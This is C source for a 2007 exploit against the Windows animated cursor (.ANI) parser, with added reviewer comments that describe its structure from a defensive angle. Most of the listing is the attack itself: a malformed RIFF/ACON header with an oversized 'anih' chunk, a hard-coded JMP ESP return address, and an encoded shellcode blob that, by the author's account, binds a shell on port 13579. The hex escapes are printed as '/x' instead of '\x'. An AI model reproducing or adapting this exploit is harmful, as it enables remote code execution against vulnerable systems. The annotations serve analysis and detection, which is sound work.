/*
 * .ANI exploit tested on Windows XP SP2 - Portuguese
 * Shellcode port bind 13579
 * JMP ESP Addr - ntdll.dll
 *
 * Greetz: Marsu, Devcode, Str0ke, Dave, Sekure.org guys, Sauna.
 * Exploit coded listen sauna hits
 * Featuring Luiz Zanardo's gigs "Minoide -?/x52/x49/x46/x46/x00/x04/x00/x41"
 * @ www.myspace.com/fuzzyproject
 *
 * Breno Silva Pinto
 * bsilva[at]Sekure.org
 */

/*
 * Reviewer notes (defensive reading of this listing):
 *
 * - Purpose: writes a fixed 1024-byte file to the path given in argv[1].
 *   The file is a RIFF/ACON (animated cursor) container with two "anih"
 *   chunks, padding, a 4-byte address and an opaque payload.
 * - NOTE(review): every literal on this page is printed with "/x" and "/n"
 *   where C escapes would normally appear, so as printed the arrays hold
 *   text, not bytes. The byte-level notes below read each "/xNN" as the
 *   hex value NN; nothing here has been compiled or run.
 * - Malformed-input signature: the first "anih" chunk declares length 0x24,
 *   the second declares 0x3A8. The fixed animated-cursor header is 36 (0x24)
 *   bytes, so an "anih" chunk claiming any other length is the anomaly a
 *   file scanner, mail/web gateway or parser should reject.
 * - Host/network indicator: the author's header says the payload binds
 *   port 13579. The payload itself is opaque here, so that is the author's
 *   claim, not something this listing demonstrates.
 * - Portability: the 4-byte address is hard-coded and, per the author's
 *   header, belongs to one specific ntdll.dll build (XP SP2, Portuguese).
 */
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

/* File prefix, 88 bytes when read as hex: container header plus chunk headers. */
unsigned char aniheader[] =
/* "RIFF", length field 0x400, "ACON", then the first "anih" tag */
"/x52/x49/x46/x46/x00/x04/x00/x00/x41/x43/x4F/x4E/x61/x6E/x69/x68"
/* first anih chunk: declared length 0x24, followed by its 36 bytes of data */
"/x24/x00/x00/x00/x24/x00/x00/x00/xFF/xFF/x00/x00/x0A/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
/* end of first anih data, then two chunks tagged "TSIL" */
"/x10/x00/x00/x00/x01/x00/x00/x00/x54/x53/x49/x4C/x03/x00/x00/x00"
"/x10/x00/x00/x00/x54/x53/x49/x4C/x03/x00/x00/x00/x02/x02/x02/x02"
/* second "anih" tag with declared length 0x3A8 (the oversized chunk) */
"/x61/x6E/x69/x68/xA8/x03/x00/x00";

/*
 * Opaque payload: 16 bytes of 0x90 followed by an encoded blob.
 * Its behaviour cannot be read from this listing; the only description
 * available is the author's header ("port bind 13579").
 */
unsigned char Shellcode[] =
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x29/xc9/x83/xe9/xaf/xd9/xee/xd9/x74/x24/xf4/x5b/x81/x73/x13/x8f"
"/x35/x37/x85/x83/xeb/xfc/xe2/xf4/x73/x5f/xdc/xca/x67/xcc/xc8/x7a"
"/x70/x55/xbc/xe9/xab/x11/xbc/xc0/xb3/xbe/x4b/x80/xf7/x34/xd8/x0e"
"/xc0/x2d/xbc/xda/xaf/x34/xdc/x66/xbf/x7c/xbc/xb1/x04/x34/xd9/xb4"
"/x4f/xac/x9b/x01/x4f/x41/x30/x44/x45/x38/x36/x47/x64/xc1/x0c/xd1"
"/xab/x1d/x42/x66/x04/x6a/x13/x84/x64/x53/xbc/x89/xc4/xbe/x68/x99"
"/x8e/xde/x34/xa9/x04/xbc/x5b/xa1/x93/x54/xf4/xb4/x4f/x51/xbc/xc5"
"/xbf/xbe/x77/x89/x04/x45/x2b/x28/x04/x75/x3f/xdb/xe7/xbb/x79/x8b"
"/x63/x65/xc8/x53/xbe/xee/x51/xd6/xe9/x5d/x04/xb7/xe7/x42/x44/xb7"
"/xd0/x61/xc8/x55/xe7/xfe/xda/x79/xb4/x65/xc8/x53/xd0/xbc/xd2/xe3"
"/x0e/xd8/x3f/x87/xda/x5f/x35/x7a/x5f/x5d/xee/x8c/x7a/x98/x60/x7a"
"/x59/x66/x64/xd6/xdc/x66/x74/xd6/xcc/x66/xc8/x55/xe9/x5d/x02/x8e"
"/xe9/x66/xbe/x64/x1a/x5d/x93/x9f/xff/xf2/x60/x7a/x59/x5f/x27/xd4"
"/xda/xca/xe7/xed/x2b/x98/x19/x6c/xd8/xca/xe1/xd6/xda/xca/xe7/xed"
"/x6a/x7c/xb1/xcc/xd8/xca/xe1/xd5/xdb/x61/x62/x7a/x5f/xa6/x5f/x62"
"/xf6/xf3/x4e/xd2/x70/xe3/x62/x7a/x5f/x53/x5d/xe1/xe9/x5d/x54/xe8"
"/x06/xd0/x5d/xd5/xd6/x1c/xfb/x0c/x68/x5f/x73/x0c/x6d/x04/xf7/x76"
"/x25/xcb/x75/xa8/x71/x77/x1b/x16/x02/x4f/x0f/x2e/x24/x9e/x5f/xf7"
"/x71/x86/x21/x7a/xfa/x71/xc8/x53/xd4/x62/x65/xd4/xde/x64/x5d/x84"
"/xde/x64/x62/xd4/x70/xe5/x5f/x28/x56/x30/xf9/xd6/x70/xe3/x5d/x7a"
"/x70/x02/xc8/x55/x04/x62/xcb/x06/x4b/x51/xc8/x53/xdd/xca/xe7/xed"
"/xf1/xed/xd5/xf6/xdc/xca/xe1/x7a/x5f/x35/x37/x85";

/*
 * Builds the 1024-byte buffer and writes it to argv[1].
 *
 * Layout of the written file, in the order the overlays are applied:
 *   0    .. 1023  filled with 0x90
 *   0    ..       aniheader (container and chunk headers)
 *   168  .. 171   4-byte value the original comment labels "JMP ESP - NTDLL"
 *   198  ..       Shellcode
 *
 * Returns 0 on every path, including the usage and fopen-failure paths.
 */
int main( int argc, char **argv )
{
	char Buffer[1024];
	FILE *f;

	/* Exactly one argument is expected: the output file name. */
	if ( argc < 2 )
	{
		printf("usage %s <file.ani>/n",argv[0]);
		return 0;
	}

	/* Pre-fill so every byte not overwritten below is 0x90. */
	memset( Buffer, 0x90, sizeof( Buffer ) );
	/* sizeof - 1 leaves out the terminating NUL of the string literal. */
	memcpy( Buffer, aniheader, sizeof( aniheader ) - 1 );
	memcpy( Buffer + 168, "/xed/x1e/x94/x7c", 4 ); // JMP ESP - NTDLL. Hey Dave ... this is for you brotha!
	memcpy( Buffer + 198, Shellcode, sizeof( Shellcode ) - 1 );

	f = fopen( argv[1], "wb" );
	if ( f == NULL )
	{
		printf("Cannot create file/n");
		return 0;
	}

	/* The whole buffer is written regardless of how much of it was overlaid. */
	fwrite(Buffer, 1, 1024, f);
	fclose(f);
	printf(".ANI file created!/n");
	return 0;
}

// milw0rm.com [2007-04-09]
MS Windows Animated Cursor (.ANI) Local Overflow Exploit